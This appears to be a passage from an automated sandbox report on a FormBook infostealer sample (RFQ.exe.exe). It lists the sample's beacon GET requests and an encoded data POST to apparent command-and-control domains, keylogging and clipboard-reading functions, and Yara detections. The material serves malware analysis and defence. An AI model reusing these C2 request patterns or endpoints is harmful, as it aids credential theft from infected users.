www.nusaliterainspirasi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=PZkH6llHoqFvvgYvV7p0jyJ4zE2wugCWkpTMu12MC83jrlv2PlfP15O4FxttxOVUzuUw HTTP/1.1Host: www.teccommunications.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?tVT=HCt+Yhx/h4l+FCj3nKRKOvS7Xa1e0tc/Egfr+bgHKkeQjLAOt82B/JBt+eO2F9D4/3gd&MR-p=0tPLH85x-lH HTTP/1.1Host: www.obsoletelabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?tVT=5W/5kEIdtxVt3n/xoeTRd2P1yDG4A43nFAD006cGMUhROXoTda6GZj7hA5S0bqxvW5XG&MR-p=0tPLH85x-lH HTTP/1.1Host: www.artiyonq.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=dcH6q++BfneLHwYr+7wkAtOqeHmKUMZpIhb6VvBnwf4Bd/1QFFGV2dHI+mdn934ofCRD HTTP/1.1Host: www.tgers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1Host: www.kmwhbl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: cdn.onenote.net
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.addis.techConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.addis.techUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.addis.tech/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 74 47 75 50 41 39 53 76 64 6f 49 51 66 53 51 4e 65 52 6f 6b 4c 51 35 54 46 41 6c 4f 6b 64 66 5a 62 75 30 44 6b 6e 7e 77 50 48 76 35 68 66 31 4b 53 6b 64 77 64 63 74 50 42 59 47 63 5a 68 34 7a 4a 59 69 34 73 54 4f 54 45 36 36 56 4a 66 53 66 74 7a 43 36 4e 56 37 6d 61 4a 79 73 70 30 46 56 51 31 42 62 47 61 48 4e 4e 6f 6f 41 4f 62 30 6d 54 31 52 5a 45 35 75 74 4b 7a 78 68 50 71 52 35 65 54 43 57 53 7a 49 6c 4c 69 7a 59 6f 72 28 62 4e 55 54 6d 6b 70 44 5a 79 61 7a 53 68 48 50 48 62 74 7e 5a 79 2d 4b 48 65 47 61 6d 38 45 64 2d 68 57 63 6a 6e 31 62 74 50 6e 63 4b 45 4e 67 6c 72 6a 67 46 4f 2d 43 52 4f 52 62 32 6f 53 44 45 71 36 62 58 48 37 76 33 49 4a 6f 74 52 57 73 71 4f 51 28 67 67 52 59 4f 54 49 56 77 6a 6e 7a 57 6e 4a 7e 72 42 61 44 76 70 70 76 5a 70 76 32 37 71 56 6c 79 56 7a 6c 34 36 4f 44 59 7a 66 55 44 65 79 49 6c 69 2d 30 73 74 78 49 4c 59 30 70 5a 4b 4c 48 55 4b 53 6c 6b 54 39 35 39 73 4f 43 45 38 56 53 6f 47 46 51 4e 5a 45 71 38 49 42 6d 4d 78 61 73 76 54 45 6f 6e 62 6a 41 52 51 44 63 44 53 77 36 50 31 6a 75 7a 39 43 73 35 73 76 28 50 31 79 72 64 45 44 39 62 6c 72 78 53 44 30 61 4f 6b 54 4d 4f 58 65 77 36 61 36 42 41 34 4d 36 38 43 34 34 4c 54 4a 43 39 63 36 37 64 43 6a 6e 57 37 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVT=tGuPA9SvdoIQfSQNeRokLQ5TFAlOkdfZbu0Dkn~wPHv5hf1KSkdwdctPBYGcZh4zJYi4sTOTE66VJfSftzC6NV7maJysp0FVQ1BbGaHNNooAOb0mT1RZE5utKzxhPqR5eTCWSzIlLizYor(bNUTmkpDZyazShHPHbt~Zy-KHeGam8Ed-hWcjn1btPncKENglrjgFO-CRORb2oSDEq6bXH7v3IJotRWsqOQ(ggRYOTIVwjnzWnJ~rBaDvppvZpv27qVlyVzl46ODYzfUDeyIli-0stxILY0pZKLHUKSlkT959sOCE8VSoGFQNZEq8IBmMxasvTEonbjARQDcDSw6P1juz9Cs5sv(P1yrdED9blrxSD0aOkTMOXew6a6BA4M68C44LTJC9c67dCjnW7g).
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeX-Powered-By: PHP/7.0.33Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: ; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Encoding: gzipVary: Accept-EncodingDate: Wed, 24 Jun 2020 01:54:03 GMTServer: LiteSpeedData Raw: 63 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 6d 6f db 38 12 fe 6c 03 f7 1f 14 16 4d 2c 54 6f b6 93 d8 71 2c 17 6d da de ed 6d bb ed b5 dd 3b 1c 36 c5 62 2c d1 32 6d 8a d4 92 b4 9d 5c 9a ff 7e 20 25 45 b2 f3 e6 74 0d dc e5 43 c4 d7 e1 33 c3 99 e1 70 e8 e1 de 9b 8f 67 5f ff fd e9 ad 35 55 29 1d 35 87 fa 63 51 60 49 88 30 43 a3 66 73 38 c5 10 8f 9a 8d 61 8a 15 58 d1 14 84 c4 2a 44 bf 7e 7d e7 f6 91 e5 df f4 30 48 71 88 96 04 af 32 2e 14 b2 22 ce 14 66 2a 44 2b 12 ab 69 18 e3 25 89 b0 6b 2a 8e 45 18 51 04 a8 2b 23 a0 38 6c eb 75 1a 43 4a d8 dc 12 98 86 28 13 7c 42 28 46 d6 54 e0 49 88 a6 4a 65 03 df 4f d2 2c f1 b8 48 fc 8b 09 f3 db ed 62 f1 da 2c c2 92 31 44 f3 8d 69 6c 21 81 12 85 05 10 26 33 22 40 12 2f e2 a9 7f 91 52 91 45 5e 36 cd 0c a5 66 63 a8 88 a2 78 f4 09 12 6c 31 ae ac 09 5f b0 78 e8 e7 ad cd 0a de 41 cc a4 9b 09 3c c1 2a 9a 1e e4 18 0f 7c ff 9e 75 0e b4 8c 1e 9d 2c 03 6f 95 69 58 5b 0e f7 12 01 4b 50 20 b6 9f 33 e1 4c 49 2f e1 3c a1 18 32 22 b7 9f 29 bd 95 96 fb 06 34 04 54 61 c1 40 61 64 a9 cb 0c 87 08 b2 8c 92 08 14 e1 cc 17 52 be b8 48 29 b2 8c f8 42 64 ed 0b f8 63 c1 4f ad 77 18 c7 5b ee d0 04 e3 d8 37 9b 53 c9 ef 07 57 3d e3 69 8a 99 92 4f 59 3e 2a e6 f8 15 8e 46 63 28 23 41 32 55 70 ac f0 85 f2 67 b0 84 bc 15 8d 9a 8d 46 63 45 58 cc 57 de ef ab 0c a7 7c 46 be 60 a5 08 4b a4 15 5a 57 68 0c 12 ff 2a 28 1a 18 a5 96 83 73 ff dc 2f c4 7b ee 93 14 12 2c cf fd 88 0b 7c ee 9b c9 e7 7e bb ed 75 bc e0 dc ef 75 2e 7a 9d 73 1f 39 08 5f 28 34 40 5e c6 12 e4 20 b9 4c 7e 8c 9e 5c 26 86 9a 5c 26 6f 73 82 72 69 08 f2 85 88 30 1a 5c a1 88 b3 08 94 81 51 e0 35 70 ef d1 f3 73 7f 95 b9 84 45 74 11 6b 1e 66 d2 34 98 d9 ae c0 14 83 c4 5e 4a 98 37 93 e8 fa fa 54 cb 69 6f b2 60 91 56 96 16 38 63 27 b2 af ca ba 15 eb 16 fb 6a 09 c2 8a c2 2f 4a 10 96 78 13 c1 d3 b3 29 88 33 1e e3 53 ea 45 14 83 f8 8c 23 d5 0a 9c c0 99 7b b9 63 99 7b 53 4c 92 a9 b2 1d ea 4d 08 a5 5f f1 85 6a 45 9e 56 cc cb 96 9a 12 e9 80 ed 04 4e 60 9f 6a da 71 38 f7 14 7f 03 0a 7e fd fc be 65 ff 09 aa e3 1a 55 bc 41 55 60 b5 10 cc 8a c3 30 c4 d7 37 2c e2 16 e4 0c 8e 4f c9 a4 b5 47 bf 7f df ab 20 db f9 9c bd f6 a9 5c 11 15 4d 5b d4 d3 9a f6 1a 24 a6 84 e1 10 29 9e 21 cd 22 d7 0e f6 38 08 ac 6e 27 bb b0 5e 09 02 14 39 60 5f 45 20 31 9a 50 48 d0 a0 20 d5 1a 87 71 eb b7 a3 a3 ee d1 b1 73 74 dc ef 1c 3b 37 e5 f6 c9 37 67 ad a7 df 09 ba 6b dd b6 bd bf bf 46 a0 d7 ed 76 9c a3 e3 76 a7 ef 1c 1d 1f 76 ba 55 b9 ad 5b ca f6 76 55 ee 06 55 b9 3e fe b0 57 2d 6e a8 e6 8b df 90 e8 3a eb 0d ed fe 46 43 a7 bd d1 d0 0d 36 1a 3a 9b 34 0e 7b df 6c 67 6f 6c 9f 1a 31 15 0a 5e 6c d3 8d 98 34 1f bd e3
 Urls found in memory or binary data Show sources
 Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com Source: explorer.exe, 00000009.00000000.831639365.0000000000CF0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

 Contains functionality for read data from the clipboard Show sources
 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E46B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 6_2_00E46B0C
 Contains functionality to read the clipboard data Show sources
 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E46B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 6_2_00E46B0C
 Contains functionality to retrieve information about pressed keystrokes Show sources
 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E32B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 6_2_00E32B37
 Potential key logger detected (key state polling based) Show sources

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORY Source: Yara match File source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPE Source: Yara match File source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Binary is likely a compiled AutoIt script file Show sources
 Source: RFQ.exe.exe, 00000000.00000000.762180934.0000000000E9E000.00000002.00020000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. Source: RFQ.exe.exe, 00000000.00000000.762180934.0000000000E9E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: This is a third-party compiled AutoIt script. 6_2_00DF3D19 Source: RFQ.exe.exe String found in binary or memory: This is a third-party compiled AutoIt script. Source: RFQ.exe.exe, 00000006.00000000.813152196.0000000000E9E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer Source: RFQ.exe.exe, 00000007.00000000.817261592.0000000000E9E000.00000002.00020000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. Source: RFQ.exe.exe, 00000007.00000000.817261592.0000000000E9E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer Source: RFQ.exe.exe, 00000008.00000002.883444662.0000000000E9E000.00000002.00020000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. Source: RFQ.exe.exe, 00000008.00000002.883444662.0000000000E9E000.00000002.00020000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer Source: RFQ.exe.exe String found in binary or memory: This is a third-party compiled AutoIt script. Source: RFQ.exe.exe String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC\$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
 Contains functionality to call native functions Show sources